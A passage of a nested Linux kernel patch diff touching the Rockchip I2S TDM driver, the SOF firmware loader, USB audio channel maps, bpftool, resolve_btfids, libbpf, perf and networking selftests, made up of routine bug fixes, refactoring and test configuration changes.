+@@ -1110,7 +812,6 @@ static int rockchip_i2s_tdm_set_bclk_ratio(struct snd_soc_dai *dai,
+ static const struct snd_soc_dai_ops rockchip_i2s_tdm_dai_ops = {
+ 	.hw_params = rockchip_i2s_tdm_hw_params,
+ 	.set_bclk_ratio	= rockchip_i2s_tdm_set_bclk_ratio,
+-	.set_sysclk = rockchip_i2s_tdm_set_sysclk,
+ 	.set_fmt = rockchip_i2s_tdm_set_fmt,
+ 	.set_tdm_slot = rockchip_dai_tdm_slot,
+ 	.trigger = rockchip_i2s_tdm_trigger,
+@@ -1433,35 +1134,6 @@ static void rockchip_i2s_tdm_path_config(struct rk_i2s_tdm_dev *i2s_tdm,
+ 		rockchip_i2s_tdm_tx_path_config(i2s_tdm, num);
+ }
+ 
+-static int rockchip_i2s_tdm_get_calibrate_mclks(struct rk_i2s_tdm_dev *i2s_tdm)
+-{
+-	int num_mclks = 0;
+-
+-	i2s_tdm->mclk_tx_src = devm_clk_get(i2s_tdm->dev, "mclk_tx_src");
+-	if (!IS_ERR(i2s_tdm->mclk_tx_src))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_rx_src = devm_clk_get(i2s_tdm->dev, "mclk_rx_src");
+-	if (!IS_ERR(i2s_tdm->mclk_rx_src))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_root0 = devm_clk_get(i2s_tdm->dev, "mclk_root0");
+-	if (!IS_ERR(i2s_tdm->mclk_root0))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_root1 = devm_clk_get(i2s_tdm->dev, "mclk_root1");
+-	if (!IS_ERR(i2s_tdm->mclk_root1))
+-		num_mclks++;
+-
+-	if (num_mclks < 4 && num_mclks != 0)
+-		return -ENOENT;
+-
+-	if (num_mclks == 4)
+-		i2s_tdm->mclk_calibrate = 1;
+-
+-	return 0;
+-}
+-
+ static int rockchip_i2s_tdm_path_prepare(struct rk_i2s_tdm_dev *i2s_tdm,
+ 					 struct device_node *np,
+ 					 bool is_rx_path)
+@@ -1609,11 +1281,6 @@ static int rockchip_i2s_tdm_probe(struct platform_device *pdev)
+ 	i2s_tdm->io_multiplex =
+ 		of_property_read_bool(node, "rockchip,io-multiplex");
+ 
+-	ret = rockchip_i2s_tdm_get_calibrate_mclks(i2s_tdm);
+-	if (ret)
+-		return dev_err_probe(i2s_tdm->dev, ret,
+-				     "mclk-calibrate clocks missing");
+-
+ 	regs = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(regs)) {
+ 		return dev_err_probe(i2s_tdm->dev, PTR_ERR(regs),
+@@ -1666,13 +1333,6 @@ static int rockchip_i2s_tdm_probe(struct platform_device *pdev)
+ 		goto err_disable_hclk;
+ 	}
+ 
+-	if (i2s_tdm->mclk_calibrate) {
+-		i2s_tdm->mclk_root0_initial_freq = clk_get_rate(i2s_tdm->mclk_root0);
+-		i2s_tdm->mclk_root1_initial_freq = clk_get_rate(i2s_tdm->mclk_root1);
+-		i2s_tdm->mclk_root0_freq = i2s_tdm->mclk_root0_initial_freq;
+-		i2s_tdm->mclk_root1_freq = i2s_tdm->mclk_root1_initial_freq;
+-	}
+-
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	regmap_update_bits(i2s_tdm->regmap, I2S_DMACR, I2S_DMACR_TDL_MASK,
+diff --git a/sound/soc/sof/ipc3-loader.c b/sound/soc/sof/ipc3-loader.c
+index bf423ca4e97bb..6e3ef06721106 100644
+--- a/sound/soc/sof/ipc3-loader.c
++++ b/sound/soc/sof/ipc3-loader.c
+@@ -138,8 +138,7 @@ static ssize_t ipc3_fw_ext_man_size(struct snd_sof_dev *sdev, const struct firmw
+ 
+ static size_t sof_ipc3_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	const struct sof_ext_man_elem_header *elem_hdr;
+ 	const struct sof_ext_man_header *head;
+ 	ssize_t ext_man_size;
+@@ -149,6 +148,8 @@ static size_t sof_ipc3_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ 
+ 	head = (struct sof_ext_man_header *)fw->data;
+ 	remaining = head->full_size - head->header_size;
++	if (remaining < 0 || remaining > sdev->basefw.fw->size)
++		return -EINVAL;
+ 	ext_man_size = ipc3_fw_ext_man_size(sdev, fw);
+ 
+ 	/* Assert firmware starts with extended manifest */
+@@ -310,18 +311,18 @@ static int sof_ipc3_parse_module_memcpy(struct snd_sof_dev *sdev,
+ 
+ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	u32 payload_offset = sdev->basefw.payload_offset;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct snd_sof_fw_header *header;
+ 	struct snd_sof_mod_hdr *module;
+ 	int (*load_module)(struct snd_sof_dev *sof_dev, struct snd_sof_mod_hdr *hdr);
+ 	size_t remaining;
+ 	int ret, count;
+ 
+-	if (!plat_data->fw)
++	if (!fw)
+ 		return -EINVAL;
+ 
+-	header = (struct snd_sof_fw_header *)(fw->data + plat_data->fw_offset);
++	header = (struct snd_sof_fw_header *)(fw->data + payload_offset);
+ 	load_module = sof_ops(sdev)->load_module;
+ 	if (!load_module) {
+ 		dev_dbg(sdev->dev, "Using generic module loading\n");
+@@ -331,9 +332,8 @@ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ 	}
+ 
+ 	/* parse each module */
+-	module = (struct snd_sof_mod_hdr *)(fw->data + plat_data->fw_offset +
+-					    sizeof(*header));
+-	remaining = fw->size - sizeof(*header) - plat_data->fw_offset;
++	module = (struct snd_sof_mod_hdr *)(fw->data + payload_offset + sizeof(*header));
++	remaining = fw->size - sizeof(*header) - payload_offset;
+ 	/* check for wrap */
+ 	if (remaining > fw->size) {
+ 		dev_err(sdev->dev, "%s: fw size smaller than header size\n", __func__);
+@@ -374,19 +374,19 @@ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ 
+ static int sof_ipc3_validate_firmware(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	u32 payload_offset = sdev->basefw.payload_offset;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct snd_sof_fw_header *header;
+-	size_t fw_size = fw->size - plat_data->fw_offset;
++	size_t fw_size = fw->size - payload_offset;
+ 
+-	if (fw->size <= plat_data->fw_offset) {
++	if (fw->size <= payload_offset) {
+ 		dev_err(sdev->dev,
+ 			"firmware size must be greater than firmware offset\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* Read the header information from the data pointer */
+-	header = (struct snd_sof_fw_header *)(fw->data + plat_data->fw_offset);
++	header = (struct snd_sof_fw_header *)(fw->data + payload_offset);
+ 
+ 	/* verify FW sig */
+ 	if (strncmp(header->sig, SND_SOF_FW_SIG, SND_SOF_FW_SIG_SIZE) != 0) {
+diff --git a/sound/soc/sof/ipc4-loader.c b/sound/soc/sof/ipc4-loader.c
+index e635ae515fa9f..9f433e9b4cd37 100644
+--- a/sound/soc/sof/ipc4-loader.c
++++ b/sound/soc/sof/ipc4-loader.c
+@@ -17,9 +17,8 @@
+ static size_t sof_ipc4_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ {
+ 	struct sof_ipc4_fw_data *ipc4_data = sdev->private;
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+ 	struct sof_man4_fw_binary_header *fw_header;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct sof_ext_manifest4_hdr *ext_man_hdr;
+ 	struct sof_man4_module_config *fm_config;
+ 	struct sof_ipc4_fw_module *fw_module;
+@@ -138,9 +137,8 @@ static int sof_ipc4_validate_firmware(struct snd_sof_dev *sdev)
+ {
+ 	struct sof_ipc4_fw_data *ipc4_data = sdev->private;
+ 	u32 fw_hdr_offset = ipc4_data->manifest_fw_hdr_offset;
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+ 	struct sof_man4_fw_binary_header *fw_header;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct sof_ext_manifest4_hdr *ext_man_hdr;
+ 
+ 	ext_man_hdr = (struct sof_ext_manifest4_hdr *)fw->data;
+diff --git a/sound/soc/sof/loader.c b/sound/soc/sof/loader.c
+index 5f51d936b3067..ba8e3aae0a5cb 100644
+--- a/sound/soc/sof/loader.c
++++ b/sound/soc/sof/loader.c
+@@ -22,7 +22,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	int ret;
+ 
+ 	/* Don't request firmware again if firmware is already requested */
+-	if (plat_data->fw)
++	if (sdev->basefw.fw)
+ 		return 0;
+ 
+ 	fw_filename = kasprintf(GFP_KERNEL, "%s/%s",
+@@ -31,7 +31,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	if (!fw_filename)
+ 		return -ENOMEM;
+ 
+-	ret = request_firmware(&plat_data->fw, fw_filename, sdev->dev);
++	ret = request_firmware(&sdev->basefw.fw, fw_filename, sdev->dev);
+ 
+ 	if (ret < 0) {
+ 		dev_err(sdev->dev,
+@@ -48,7 +48,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	ext_man_size = sdev->ipc->ops->fw_loader->parse_ext_manifest(sdev);
+ 	if (ext_man_size > 0) {
+ 		/* when no error occurred, drop extended manifest */
+-		plat_data->fw_offset = ext_man_size;
++		sdev->basefw.payload_offset = ext_man_size;
+ 	} else if (!ext_man_size) {
+ 		/* No extended manifest, so nothing to skip during FW load */
+ 		dev_dbg(sdev->dev, "firmware doesn't contain extended manifest\n");
+@@ -58,6 +58,12 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 			fw_filename, ret);
+ 	}
+ 
++	/*
++	 * Until the platform code is switched to use the new container the fw
++	 * and payload offset must be set in plat_data
++	 */
++	plat_data->fw = sdev->basefw.fw;
++	plat_data->fw_offset = sdev->basefw.payload_offset;
+ err:
+ 	kfree(fw_filename);
+ 
+@@ -100,7 +106,8 @@ int snd_sof_load_firmware_memcpy(struct snd_sof_dev *sdev)
+ 	return 0;
+ 
+ error:
+-	release_firmware(plat_data->fw);
++	release_firmware(sdev->basefw.fw);
++	sdev->basefw.fw = NULL;
+ 	plat_data->fw = NULL;
+ 	return ret;
+ 
+@@ -185,7 +192,8 @@ EXPORT_SYMBOL(snd_sof_run_firmware);
+ void snd_sof_fw_unload(struct snd_sof_dev *sdev)
+ {
+ 	/* TODO: support module unloading at runtime */
+-	release_firmware(sdev->pdata->fw);
++	release_firmware(sdev->basefw.fw);
++	sdev->basefw.fw = NULL;
+ 	sdev->pdata->fw = NULL;
+ }
+ EXPORT_SYMBOL(snd_sof_fw_unload);
+diff --git a/sound/soc/sof/sof-priv.h b/sound/soc/sof/sof-priv.h
+index de08825915b35..3d70b57e4864d 100644
+--- a/sound/soc/sof/sof-priv.h
++++ b/sound/soc/sof/sof-priv.h
+@@ -136,6 +136,17 @@ struct snd_sof_platform_stream_params {
+ 	bool cont_update_posn;
+ };
+ 
++/**
++ * struct sof_firmware - Container struct for SOF firmware
++ * @fw:			Pointer to the firmware
++ * @payload_offset:	Offset of the data within the loaded firmware image to be
++ *			loaded to the DSP (skipping for example ext_manifest section)
++ */
++struct sof_firmware {
++	const struct firmware *fw;
++	u32 payload_offset;
++};
++
+ /*
+  * SOF DSP HW abstraction operations.
+  * Used to abstract DSP HW architecture and any IO busses between host CPU
+@@ -487,6 +498,9 @@ struct snd_sof_dev {
+ 	spinlock_t ipc_lock;	/* lock for IPC users */
+ 	spinlock_t hw_lock;	/* lock for HW IO access */
+ 
++	/* Main, Base firmware image */
++	struct sof_firmware basefw;
++
+ 	/*
+ 	 * ASoC components. plat_drv fields are set dynamically so
+ 	 * can't use const
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index 3d4add94e367d..d5409f3879455 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -300,9 +300,12 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
+ 	c = 0;
+ 
+ 	if (bits) {
+-		for (; bits && *maps; maps++, bits >>= 1)
++		for (; bits && *maps; maps++, bits >>= 1) {
+ 			if (bits & 1)
+ 				chmap->map[c++] = *maps;
++			if (c == chmap->channels)
++				break;
++		}
+ 	} else {
+ 		/* If we're missing wChannelConfig, then guess something
+ 		    to make sure the channel map is not skipped entirely */
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 41c02b6f6f043..7e0b846e17eef 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2200,7 +2200,7 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+-		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
++		obj->rodata->num_cpu * obj->rodata->num_metric, sizeof(int));
+ 	if (!profile_perf_events) {
+ 		p_err("failed to allocate memory for perf_event array: %s",
+ 		      strerror(errno));
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 77058174082d7..ef0764d6891e4 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -70,6 +70,7 @@
+ #include <sys/stat.h>
+ #include <fcntl.h>
+ #include <errno.h>
++#include <linux/btf_ids.h>
+ #include <linux/rbtree.h>
+ #include <linux/zalloc.h>
+ #include <linux/err.h>
+@@ -78,7 +79,7 @@
+ #include <subcmd/parse-options.h>
+ 
+ #define BTF_IDS_SECTION	".BTF_ids"
+-#define BTF_ID		"__BTF_ID__"
++#define BTF_ID_PREFIX	"__BTF_ID__"
+ 
+ #define BTF_STRUCT	"struct"
+ #define BTF_UNION	"union"
+@@ -89,6 +90,14 @@
+ 
+ #define ADDR_CNT	100
+ 
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++# define ELFDATANATIVE	ELFDATA2LSB
++#elif __BYTE_ORDER == __BIG_ENDIAN
++# define ELFDATANATIVE	ELFDATA2MSB
++#else
++# error "Unknown machine endianness!"
++#endif
++
+ struct btf_id {
+ 	struct rb_node	 rb_node;
+ 	char		*name;
+@@ -116,6 +125,7 @@ struct object {
+ 		int		 idlist_shndx;
+ 		size_t		 strtabidx;
+ 		unsigned long	 idlist_addr;
++		int		 encoding;
+ 	} efile;
+ 
+ 	struct rb_root	sets;
+@@ -161,7 +171,7 @@ static int eprintf(int level, int var, const char *fmt, ...)
+ 
+ static bool is_btf_id(const char *name)
+ {
+-	return name && !strncmp(name, BTF_ID, sizeof(BTF_ID) - 1);
++	return name && !strncmp(name, BTF_ID_PREFIX, sizeof(BTF_ID_PREFIX) - 1);
+ }
+ 
+ static struct btf_id *btf_id__find(struct rb_root *root, const char *name)
+@@ -319,6 +329,7 @@ static int elf_collect(struct object *obj)
+ {
+ 	Elf_Scn *scn = NULL;
+ 	size_t shdrstrndx;
++	GElf_Ehdr ehdr;
+ 	int idx = 0;
+ 	Elf *elf;
+ 	int fd;
+@@ -350,6 +361,13 @@ static int elf_collect(struct object *obj)
+ 		return -1;
+ 	}
+ 
++	if (gelf_getehdr(obj->efile.elf, &ehdr) == NULL) {
++		pr_err("FAILED cannot get ELF header: %s\n",
++			elf_errmsg(-1));
++		return -1;
++	}
++	obj->efile.encoding = ehdr.e_ident[EI_DATA];
++
+ 	/*
+ 	 * Scan all the elf sections and look for save data
+ 	 * from .BTF_ids section and symbols.
+@@ -441,7 +459,7 @@ static int symbols_collect(struct object *obj)
+ 		 * __BTF_ID__TYPE__vfs_truncate__0
+ 		 * prefix =  ^
+ 		 */
+-		prefix = name + sizeof(BTF_ID) - 1;
++		prefix = name + sizeof(BTF_ID_PREFIX) - 1;
+ 
+ 		/* struct */
+ 		if (!strncmp(prefix, BTF_STRUCT, sizeof(BTF_STRUCT) - 1)) {
+@@ -649,19 +667,18 @@ static int cmp_id(const void *pa, const void *pb)
+ static int sets_patch(struct object *obj)
+ {
+ 	Elf_Data *data = obj->efile.idlist;
+-	int *ptr = data->d_buf;
+ 	struct rb_node *next;
+ 
+ 	next = rb_first(&obj->sets);
+ 	while (next) {
+-		unsigned long addr, idx;
++		struct btf_id_set8 *set8;
++		struct btf_id_set *set;
++		unsigned long addr, off;
+ 		struct btf_id *id;
+-		int *base;
+-		int cnt;
+ 
+ 		id   = rb_entry(next, struct btf_id, rb_node);
+ 		addr = id->addr[0];
+-		idx  = addr - obj->efile.idlist_addr;
++		off = addr - obj->efile.idlist_addr;
+ 
+ 		/* sets are unique */
+ 		if (id->addr_cnt != 1) {
+@@ -670,14 +687,39 @@ static int sets_patch(struct object *obj)
+ 			return -1;
+ 		}
+ 
+-		idx = idx / sizeof(int);
+-		base = &ptr[idx] + (id->is_set8 ? 2 : 1);
+-		cnt = ptr[idx];
++		if (id->is_set) {
++			set = data->d_buf + off;
++			qsort(set->ids, set->cnt, sizeof(set->ids[0]), cmp_id);
++		} else {
++			set8 = data->d_buf + off;
++			/*
++			 * Make sure id is at the beginning of the pairs
++			 * struct, otherwise the below qsort would not work.
++			 */
++			BUILD_BUG_ON(set8->pairs != &set8->pairs[0].id);
++			qsort(set8->pairs, set8->cnt, sizeof(set8->pairs[0]), cmp_id);
+ 
+-		pr_debug("sorting  addr %5lu: cnt %6d [%s]\n",
+-			 (idx + 1) * sizeof(int), cnt, id->name);
++			/*
++			 * When ELF endianness does not match endianness of the
++			 * host, libelf will do the translation when updating
++			 * the ELF. This, however, corrupts SET8 flags which are
++			 * already in the target endianness. So, let's bswap
++			 * them to the host endianness and libelf will then
++			 * correctly translate everything.
++			 */
++			if (obj->efile.encoding != ELFDATANATIVE) {
++				int i;
++
++				set8->flags = bswap_32(set8->flags);
++				for (i = 0; i < set8->cnt; i++) {
++					set8->pairs[i].flags =
++						bswap_32(set8->pairs[i].flags);
++				}
++			}
++		}
+ 
+-		qsort(base, cnt, id->is_set8 ? sizeof(uint64_t) : sizeof(int), cmp_id);
++		pr_debug("sorting  addr %5lu: cnt %6d [%s]\n",
++			 off, id->is_set ? set->cnt : set8->cnt, id->name);
+ 
+ 		next = rb_next(next);
+ 	}
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 2f882d5cb30f5..72535f00572f6 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -8,6 +8,15 @@ struct btf_id_set {
+ 	u32 ids[];
+ };
+ 
++struct btf_id_set8 {
++	u32 cnt;
++	u32 flags;
++	struct {
++		u32 id;
++		u32 flags;
++	} pairs[];
++};
++
+ #ifdef CONFIG_DEBUG_INFO_BTF
+ 
+ #include <linux/compiler.h> /* for __PASTE */
+diff --git a/tools/lib/bpf/bpf.h b/tools/lib/bpf/bpf.h
+index fddc05c667b5d..874fe362375de 100644
+--- a/tools/lib/bpf/bpf.h
++++ b/tools/lib/bpf/bpf.h
+@@ -35,7 +35,7 @@
+ extern "C" {
+ #endif
+ 
+-int libbpf_set_memlock_rlim(size_t memlock_bytes);
++LIBBPF_API int libbpf_set_memlock_rlim(size_t memlock_bytes);
+ 
+ struct bpf_map_create_opts {
+ 	size_t sz; /* size of this struct for forward/backward compatibility */
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index e2014b1250ea2..c71d4d0f5c6f3 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -70,6 +70,7 @@
+ 
+ static struct bpf_map *bpf_object__add_map(struct bpf_object *obj);
+ static bool prog_is_subprog(const struct bpf_object *obj, const struct bpf_program *prog);
++static int map_set_def_max_entries(struct bpf_map *map);
+ 
+ static const char * const attach_type_name[] = {
+ 	[BPF_CGROUP_INET_INGRESS]	= "cgroup_inet_ingress",
+@@ -4992,6 +4993,9 @@ static int bpf_object__create_map(struct bpf_object *obj, struct bpf_map *map, b
+ 
+ 	if (bpf_map_type__is_map_in_map(def->type)) {
+ 		if (map->inner_map) {
++			err = map_set_def_max_entries(map->inner_map);
++			if (err)
++				return err;
+ 			err = bpf_object__create_map(obj, map->inner_map, true);
+ 			if (err) {
+ 				pr_warn("map '%s': failed to create inner map: %d\n",
+diff --git a/tools/lib/bpf/libbpf_internal.h b/tools/lib/bpf/libbpf_internal.h
+index 377642ff51fce..8669f6e0f6e2f 100644
+--- a/tools/lib/bpf/libbpf_internal.h
++++ b/tools/lib/bpf/libbpf_internal.h
+@@ -17,6 +17,20 @@
+ #include <unistd.h>
+ #include "relo_core.h"
+ 
++/* Android's libc doesn't support AT_EACCESS in faccessat() implementation
++ * ([0]), and just returns -EINVAL even if file exists and is accessible.
++ * See [1] for issues caused by this.
++ *
++ * So just redefine it to 0 on Android.
++ *
++ * [0] https://android.googlesource.com/platform/bionic/+/refs/heads/android13-release/libc/bionic/faccessat.cpp#50
++ * [1] https://github.com/libbpf/libbpf-bootstrap/issues/250#issuecomment-1911324250
++ */
++#ifdef __ANDROID__
++#undef AT_EACCESS
++#define AT_EACCESS 0
++#endif
++
+ /* make sure libbpf doesn't use kernel-only integer typedefs */
+ #pragma GCC poison u8 u16 u32 u64 s8 s16 s32 s64
+ 
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 7314183cdcb6c..b9b0fda8374e2 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -1785,8 +1785,8 @@ static int
+ record__switch_output(struct record *rec, bool at_exit)
+ {
+ 	struct perf_data *data = &rec->data;
++	char *new_filename = NULL;
+ 	int fd, err;
+-	char *new_filename;
+ 
+ 	/* Same Size:      "2015122520103046"*/
+ 	char timestamp[] = "InvalidTimestamp";
+diff --git a/tools/perf/util/evsel.c b/tools/perf/util/evsel.c
+index 76605fde35078..7db35dbdfcefe 100644
+--- a/tools/perf/util/evsel.c
++++ b/tools/perf/util/evsel.c
+@@ -2375,7 +2375,6 @@ int evsel__parse_sample(struct evsel *evsel, union perf_event *event,
+ 	data->period = evsel->core.attr.sample_period;
+ 	data->cpumode = event->header.misc & PERF_RECORD_MISC_CPUMODE_MASK;
+ 	data->misc    = event->header.misc;
+-	data->id = -1ULL;
+ 	data->data_src = PERF_MEM_DATA_SRC_NONE;
+ 	data->vcpu = -1;
+ 
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index bc866d18973e4..ef9a3df459657 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -366,7 +366,7 @@ static void print_metric_only(struct perf_stat_config *config,
+ 	if (color)
+ 		mlen += strlen(color) + sizeof(PERF_COLOR_RESET) - 1;
+ 
+-	color_snprintf(str, sizeof(str), color ?: "", fmt, val);
++	color_snprintf(str, sizeof(str), color ?: "", fmt ?: "", val);
+ 	fprintf(out, "%*s ", mlen, str);
+ }
+ 
+diff --git a/tools/perf/util/thread_map.c b/tools/perf/util/thread_map.c
+index c9bfe4696943b..cee7fc3b5bb0c 100644
+--- a/tools/perf/util/thread_map.c
++++ b/tools/perf/util/thread_map.c
+@@ -279,13 +279,13 @@ struct perf_thread_map *thread_map__new_by_tid_str(const char *tid_str)
+ 		threads->nr = ntasks;
+ 	}
+ out:
++	strlist__delete(slist);
+ 	if (threads)
+ 		refcount_set(&threads->refcnt, 1);
+ 	return threads;
+ 
+ out_free_threads:
+ 	zfree(&threads);
+-	strlist__delete(slist);
+ 	goto out;
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/progs/test_map_in_map.c b/tools/testing/selftests/bpf/progs/test_map_in_map.c
+index f416032ba858b..b295f9b721bf8 100644
+--- a/tools/testing/selftests/bpf/progs/test_map_in_map.c
++++ b/tools/testing/selftests/bpf/progs/test_map_in_map.c
+@@ -21,6 +21,32 @@ struct {
+ 	__type(value, __u32);
+ } mim_hash SEC(".maps");
+ 
++/* The following three maps are used to test
++ * perf_event_array map can be an inner
++ * map of hash/array_of_maps.
++ */
++struct perf_event_array {
++	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
++	__type(key, __u32);
++	__type(value, __u32);
++} inner_map0 SEC(".maps");
++
++struct {
++	__uint(type, BPF_MAP_TYPE_ARRAY_OF_MAPS);
++	__uint(max_entries, 1);
++	__type(key, __u32);
++	__array(values, struct perf_event_array);
++} mim_array_pe SEC(".maps") = {
++	.values = {&inner_map0}};
++
++struct {
++	__uint(type, BPF_MAP_TYPE_HASH_OF_MAPS);
++	__uint(max_entries, 1);
++	__type(key, __u32);
++	__array(values, struct perf_event_array);
++} mim_hash_pe SEC(".maps") = {
++	.values = {&inner_map0}};
++
+ SEC("xdp")
+ int xdp_mimtest0(struct xdp_md *ctx)
+ {
+diff --git a/tools/testing/selftests/bpf/test_maps.c b/tools/testing/selftests/bpf/test_maps.c
+index b73152822aa28..81cd48cc80c23 100644
+--- a/tools/testing/selftests/bpf/test_maps.c
++++ b/tools/testing/selftests/bpf/test_maps.c
+@@ -1190,7 +1190,11 @@ static void test_map_in_map(void)
+ 		goto out_map_in_map;
+ 	}
+ 
+-	bpf_object__load(obj);
++	err = bpf_object__load(obj);
++	if (err) {
++		printf("Failed to load test prog\n");
++		goto out_map_in_map;
++	}
+ 
+ 	map = bpf_object__find_map_by_name(obj, "mim_array");
+ 	if (!map) {
+diff --git a/tools/testing/selftests/net/forwarding/config b/tools/testing/selftests/net/forwarding/config
+index 697994a9278bb..8d7a1a004b7c3 100644
+--- a/tools/testing/selftests/net/forwarding/config
++++ b/tools/testing/selftests/net/forwarding/config
+@@ -6,14 +6,49 @@ CONFIG_IPV6_MULTIPLE_TABLES=y
+ CONFIG_NET_VRF=m
+ CONFIG_BPF_SYSCALL=y
+ CONFIG_CGROUP_BPF=y
++CONFIG_DUMMY=m
++CONFIG_IPV6=y
++CONFIG_IPV6_GRE=m
++CONFIG_IPV6_MROUTE=y
++CONFIG_IPV6_MROUTE_MULTIPLE_TABLES=y
++CONFIG_IPV6_PIMSM_V2=y
++CONFIG_IP_MROUTE=y
++CONFIG_IP_MROUTE_MULTIPLE_TABLES=y
++CONFIG_IP_PIMSM_V1=y
++CONFIG_IP_PIMSM_V2=y
++CONFIG_MACVLAN=m
+ CONFIG_NET_ACT_CT=m
+ CONFIG_NET_ACT_MIRRED=m
+ CONFIG_NET_ACT_MPLS=m
++CONFIG_NET_ACT_PEDIT=m
++CONFIG_NET_ACT_POLICE=m
++CONFIG_NET_ACT_SAMPLE=m
++CONFIG_NET_ACT_SKBEDIT=m
++CONFIG_NET_ACT_TUNNEL_KEY=m
+ CONFIG_NET_ACT_VLAN=m
+ CONFIG_NET_CLS_FLOWER=m
+ CONFIG_NET_CLS_MATCHALL=m
++CONFIG_NET_CLS_BASIC=m
++CONFIG_NET_EMATCH=y
++CONFIG_NET_EMATCH_META=m
++CONFIG_NET_IPGRE=m
++CONFIG_NET_IPGRE_DEMUX=m
++CONFIG_NET_IPIP=m
++CONFIG_NET_SCH_ETS=m
+ CONFIG_NET_SCH_INGRESS=m
+ CONFIG_NET_ACT_GACT=m
++CONFIG_NET_SCH_PRIO=m
++CONFIG_NET_SCH_RED=m
++CONFIG_NET_SCH_TBF=m
++CONFIG_NET_TC_SKB_EXT=y
++CONFIG_NET_TEAM=y
++CONFIG_NET_TEAM_MODE_LOADBALANCE=y
++CONFIG_NETFILTER=y
++CONFIG_NF_CONNTRACK=m
++CONFIG_NF_FLOW_TABLE=m
++CONFIG_NF_TABLES=m
+ CONFIG_VETH=m
+ CONFIG_NAMESPACES=y
+ CONFIG_NET_NS=y
++CONFIG_VXLAN=m
++CONFIG_XFRM_USER=m
+diff --git a/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh b/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
+index ac97f07e5ce82..bd3f7d492af2b 100755
+--- a/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
++++ b/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
+@@ -354,7 +354,7 @@ __ping_ipv4()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome ARP noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 10 100
+@@ -410,7 +410,7 @@ __ping_ipv6()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome neighbor discovery noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping6_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping6_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 100
+diff --git a/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh b/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
+index d880df89bc8bd..e83fde79f40d0 100755
+--- a/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
++++ b/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
+@@ -457,7 +457,7 @@ __ping_ipv4()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome ARP noise.
